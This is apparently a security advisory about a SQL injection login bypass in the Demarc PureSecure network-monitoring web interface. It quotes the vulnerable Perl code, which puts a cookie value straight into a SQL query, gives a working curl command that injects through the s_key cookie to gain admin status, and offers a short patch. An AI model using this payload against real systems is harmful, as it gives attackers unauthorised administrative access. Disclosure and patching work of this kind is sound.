COMMAND

	Demarc PureSecure login bypass

SYSTEMS AFFECTED

	all versions ?

PROBLEM

	pokleyzz sakamaniaka says :
	

	Demarc PureSecure (http://www.demarc.org) is  an  all-inclusive  network
	monitoring solution that allows you to  monitor  an  entire  network  of
	servers from one powerful web interface.
	

	user can bypass login and get admin  status  by  sql  injection  through
	cookies s_key
	

	

	--------- line 319 ------------------------------

	elsif (($cookies{\'s_key\'}) && ($cookies{\'s_key\'}-

	>value)){

		$logged_in_as = &check_login($cookies

	{\'s_key\'}->value);

		if (!$logged_in_as){

			   &print_login_screen;

	   		&safe_exit;

		}

	-----------------------------------------------------

	

	

	s_key  = will be use for sql in fuction check_login query ( line 6114)
	

	

	---------lini 6114---------------------------------

	$sql_query = \"	SELECT \\

						

		f1,f2,f3,admin,username,UNIX_TIMESTAMP

	(current_login_timedate) AS LOGINTIME \\

					

		FROM \\

						

		dm_sessions \\

					

		WHERE current_session_id = \'$session_id\' \";

	-----------------------------------------------------

	

	

	

	 Exploit 

	 =======

	

	using curl :
	

	curl -b s_key=\\\'%20OR%20current_session_id%20like%20\\\'%\\\'%23 https://<lame host>/dm/demarc

	

	

SOLUTION

	Patch as follow :
	

	

	line 6113: &safe_slash(\\$session_id\' );